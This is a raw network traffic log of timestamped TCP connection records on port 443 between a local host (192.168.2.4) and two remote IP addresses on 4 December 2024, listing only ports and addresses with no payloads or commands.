Dec 4, 2024 12:17:57.661289930 CET	443	49898	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:58.093126059 CET	443	49898	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:58.096867085 CET	443	49898	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:58.096960068 CET	49898	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:58.096997976 CET	443	49898	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:58.097027063 CET	443	49898	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:58.097084999 CET	49898	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:58.097110987 CET	443	49898	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:58.097121954 CET	49898	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:58.097131014 CET	443	49898	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:58.100435019 CET	49903	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:58.100476980 CET	443	49903	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:58.100763083 CET	49903	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:58.100939035 CET	49903	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:58.100953102 CET	443	49903	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:58.378865004 CET	443	49901	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:58.383333921 CET	49901	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:58.383363962 CET	443	49901	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:58.383819103 CET	49901	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:58.383825064 CET	443	49901	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:58.447191954 CET	443	49899	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:58.452034950 CET	49899	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:58.452056885 CET	443	49899	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:58.452570915 CET	49899	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:58.452578068 CET	443	49899	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:58.812800884 CET	443	49901	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:58.816437960 CET	443	49901	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:58.816497087 CET	49901	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:58.821265936 CET	49901	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:58.821284056 CET	443	49901	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:58.821294069 CET	49901	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:58.821300030 CET	443	49901	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:58.827589989 CET	49904	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:58.827644110 CET	443	49904	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:58.827711105 CET	49904	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:58.828146935 CET	49904	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:58.828161001 CET	443	49904	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:58.890737057 CET	443	49899	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:58.894148111 CET	443	49899	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:58.894335985 CET	49899	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:58.894336939 CET	49899	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:58.894336939 CET	49899	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:58.897131920 CET	49905	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:58.897173882 CET	443	49905	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:58.897245884 CET	49905	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:58.897423983 CET	49905	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:58.897444963 CET	443	49905	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:59.196979046 CET	49899	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:59.197015047 CET	443	49899	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:59.885952950 CET	443	49903	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:59.886784077 CET	49903	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:59.886812925 CET	443	49903	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:59.887322903 CET	49903	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:59.887331963 CET	443	49903	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:00.074280977 CET	443	49902	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:00.074290037 CET	443	49900	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:00.074861050 CET	49902	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:00.074884892 CET	443	49902	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:00.075052023 CET	49900	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:00.075063944 CET	443	49900	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:00.075366020 CET	49902	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:00.075370073 CET	443	49902	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:00.075539112 CET	49900	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:00.075542927 CET	443	49900	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:00.328308105 CET	443	49903	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:00.331458092 CET	443	49903	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:00.331510067 CET	49903	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:00.333303928 CET	49903	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:00.333333969 CET	443	49903	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:00.333353043 CET	49903	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:00.333359957 CET	443	49903	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:00.337130070 CET	49906	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:00.337163925 CET	443	49906	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:00.337229967 CET	49906	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:00.339596987 CET	49906	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:00.339610100 CET	443	49906	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:00.508786917 CET	443	49900	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:00.512075901 CET	443	49900	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:00.512125969 CET	443	49900	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:00.512145996 CET	49900	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:00.512176991 CET	49900	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:00.512868881 CET	49900	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:00.512887001 CET	443	49900	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:00.512923956 CET	49900	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:00.512929916 CET	443	49900	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:00.516751051 CET	49907	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:00.516803026 CET	443	49907	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:00.516892910 CET	49907	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:00.517221928 CET	49907	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:00.517237902 CET	443	49907	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:00.527101040 CET	443	49902	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:00.527127981 CET	443	49902	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:00.527174950 CET	49902	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:00.527179003 CET	443	49902	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:00.527219057 CET	49902	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:00.527424097 CET	49902	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:00.527435064 CET	443	49902	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:00.527445078 CET	49902	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:00.527448893 CET	443	49902	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:00.530709982 CET	49908	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:00.530752897 CET	443	49908	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:00.530834913 CET	49908	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:00.530977011 CET	49908	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:00.530991077 CET	443	49908	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:00.545259953 CET	443	49904	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:00.545720100 CET	49904	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:00.545738935 CET	443	49904	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:00.546209097 CET	49904	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:00.546215057 CET	443	49904	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:00.678262949 CET	443	49905	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:00.678987980 CET	49905	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:00.679013014 CET	443	49905	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:00.679519892 CET	49905	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:00.679526091 CET	443	49905	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:00.980715036 CET	443	49904	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:00.983721018 CET	443	49904	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:00.983773947 CET	443	49904	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:00.983855009 CET	49904	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:00.983935118 CET	49904	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:00.983951092 CET	443	49904	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:00.983959913 CET	49904	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:00.983966112 CET	443	49904	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:00.986713886 CET	49909	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:00.986753941 CET	443	49909	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:00.986834049 CET	49909	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:00.986968040 CET	49909	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:00.986984015 CET	443	49909	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:01.122124910 CET	443	49905	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:01.125761986 CET	443	49905	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:01.126852989 CET	49905	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:01.126893044 CET	49905	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:01.126893044 CET	49905	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:01.126905918 CET	443	49905	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:01.126914978 CET	443	49905	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:01.129609108 CET	49910	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:01.129642963 CET	443	49910	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:01.129719019 CET	49910	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:01.129854918 CET	49910	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:01.129873991 CET	443	49910	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:02.124834061 CET	443	49906	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:02.165693045 CET	49906	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:02.298007965 CET	443	49907	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:02.310425997 CET	443	49908	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:02.353199005 CET	49908	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:02.353198051 CET	49907	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:02.703037024 CET	443	49909	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:02.743822098 CET	49909	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:02.846097946 CET	443	49910	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:02.915679932 CET	49910	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:03.023515940 CET	49910	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:03.023538113 CET	443	49910	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:03.024141073 CET	49910	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:03.024158955 CET	443	49910	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:03.024590969 CET	49909	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:03.024626017 CET	443	49909	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:03.025562048 CET	49909	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:03.025573015 CET	443	49909	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:03.025958061 CET	49906	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:03.025983095 CET	443	49906	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:03.026717901 CET	49906	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:03.026722908 CET	443	49906	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:03.042643070 CET	49907	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:03.042681932 CET	443	49907	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:03.043509007 CET	49907	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:03.043515921 CET	443	49907	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:03.044421911 CET	49908	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:03.044455051 CET	443	49908	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:03.044977903 CET	49908	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:03.044994116 CET	443	49908	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:03.339324951 CET	443	49910	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:03.339355946 CET	443	49910	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:03.339431047 CET	443	49910	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:03.339438915 CET	49910	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:03.339483976 CET	49910	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:03.339692116 CET	49910	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:03.339706898 CET	443	49910	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:03.339724064 CET	49910	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:03.339729071 CET	443	49910	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:03.340948105 CET	443	49909	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:03.341022968 CET	443	49909	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:03.341079950 CET	49909	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:03.341177940 CET	49909	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:03.341197968 CET	443	49909	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:03.341211081 CET	49909	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:03.341217995 CET	443	49909	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:03.343640089 CET	49911	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:03.343664885 CET	443	49911	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:03.343748093 CET	49911	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:03.343997002 CET	49912	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:03.344024897 CET	443	49912	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:03.344079971 CET	49912	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:03.344198942 CET	49911	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:03.344217062 CET	443	49911	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:03.344301939 CET	49912	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:03.344314098 CET	443	49912	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:03.351156950 CET	443	49906	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:03.354315042 CET	443	49906	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:03.354357958 CET	443	49906	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:03.354377985 CET	49906	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:03.354422092 CET	49906	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:03.354492903 CET	49906	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:03.354506969 CET	443	49906	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:03.354517937 CET	49906	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:03.354522943 CET	443	49906	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:03.356614113 CET	49913	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:03.356626987 CET	443	49913	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:03.356699944 CET	49913	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:03.356847048 CET	49913	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:03.356859922 CET	443	49913	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:03.368149042 CET	443	49907	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:03.369309902 CET	443	49908	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:03.371135950 CET	443	49907	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:03.371212006 CET	49907	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:03.371249914 CET	49907	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:03.371278048 CET	443	49907	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:03.371294022 CET	49907	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:03.371301889 CET	443	49907	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:03.372453928 CET	443	49908	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:03.372517109 CET	49908	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:03.372791052 CET	49908	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:03.372808933 CET	443	49908	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:03.372824907 CET	49908	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:03.372829914 CET	443	49908	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:03.373132944 CET	49914	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:03.373145103 CET	443	49914	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:03.373195887 CET	49914	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:03.373441935 CET	49914	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:03.373455048 CET	443	49914	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:03.375194073 CET	49915	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:03.375221968 CET	443	49915	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:03.375299931 CET	49915	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:03.375437975 CET	49915	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:03.375458956 CET	443	49915	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:03.925565004 CET	49916	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:18:03.925627947 CET	443	49916	159.69.102.165	192.168.2.4
Dec 4, 2024 12:18:03.925705910 CET	49916	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:18:03.925973892 CET	49916	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:18:03.925991058 CET	443	49916	159.69.102.165	192.168.2.4
Dec 4, 2024 12:18:04.927865028 CET	49917	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:18:04.927912951 CET	443	49917	159.69.102.165	192.168.2.4
Dec 4, 2024 12:18:04.927987099 CET	49917	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:18:04.928248882 CET	49917	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:18:04.928266048 CET	443	49917	159.69.102.165	192.168.2.4
Dec 4, 2024 12:18:05.063137054 CET	443	49912	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:05.063672066 CET	49912	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:05.063688040 CET	443	49912	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:05.064192057 CET	49912	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:05.064196110 CET	443	49912	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:05.074026108 CET	443	49913	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:05.074409008 CET	49913	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:05.074420929 CET	443	49913	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:05.074846029 CET	49913	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:05.074850082 CET	443	49913	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:05.088470936 CET	443	49914	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:05.088840961 CET	49914	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:05.088860035 CET	443	49914	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:05.089251995 CET	49914	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:05.089257956 CET	443	49914	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:05.154082060 CET	443	49915	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:05.154539108 CET	49915	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:05.154562950 CET	443	49915	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:05.155060053 CET	49915	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:05.155065060 CET	443	49915	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:05.372051001 CET	443	49916	159.69.102.165	192.168.2.4
Dec 4, 2024 12:18:05.372121096 CET	49916	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:18:05.497947931 CET	443	49912	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:05.501523018 CET	443	49912	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:05.501559973 CET	49912	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:05.501570940 CET	443	49912	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:05.501584053 CET	443	49912	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:05.501627922 CET	49912	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:05.501688004 CET	49912	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:05.501703024 CET	443	49912	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:05.501712084 CET	49912	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:05.501717091 CET	443	49912	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:05.504715919 CET	49918	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:05.504751921 CET	443	49918	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:05.504813910 CET	49918	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:05.505080938 CET	49918	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:05.505093098 CET	443	49918	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:05.508574009 CET	443	49913	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:05.511626959 CET	443	49913	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:05.511677027 CET	49913	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:05.511734009 CET	49913	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:05.511754036 CET	443	49913	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:05.511764050 CET	49913	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:05.511774063 CET	443	49913	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:05.513930082 CET	49919	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:05.513973951 CET	443	49919	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:05.514033079 CET	49919	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:05.514185905 CET	49919	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:05.514199972 CET	443	49919	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:05.523504972 CET	443	49914	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:05.526087046 CET	443	49914	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:05.526134014 CET	49914	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:05.526194096 CET	49914	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:05.526204109 CET	443	49914	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:05.526221037 CET	49914	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:05.526226044 CET	443	49914	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:05.528615952 CET	49920	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:05.528666973 CET	443	49920	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:05.528733969 CET	49920	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:05.528913975 CET	49920	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:05.528928995 CET	443	49920	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:05.597460985 CET	443	49915	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:05.601017952 CET	443	49915	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:05.601353884 CET	49915	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:05.601401091 CET	49915	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:05.601422071 CET	443	49915	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:05.601437092 CET	49915	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:05.601444006 CET	443	49915	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:05.604494095 CET	49921	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:05.604538918 CET	443	49921	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:05.604607105 CET	49921	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:05.604896069 CET	49921	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:05.604913950 CET	443	49921	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:06.368097067 CET	443	49917	159.69.102.165	192.168.2.4
Dec 4, 2024 12:18:06.368974924 CET	49917	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:18:07.230621099 CET	443	49919	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:07.231137991 CET	49919	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:07.231173992 CET	443	49919	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:07.231614113 CET	49919	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:07.231628895 CET	443	49919	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:07.246644974 CET	443	49920	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:07.247358084 CET	49920	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:07.247373104 CET	443	49920	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:07.248013973 CET	49920	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:07.248018980 CET	443	49920	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:07.327121973 CET	443	49921	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:07.327660084 CET	49921	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:07.327682972 CET	443	49921	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:07.327913046 CET	443	49918	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:07.328222990 CET	49918	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:07.328246117 CET	443	49918	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:07.328558922 CET	49921	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:07.328567982 CET	443	49921	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:07.328624964 CET	49918	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:07.328629971 CET	443	49918	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:07.664777994 CET	443	49919	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:07.668240070 CET	443	49919	13.107.246.63	192.168.2.4
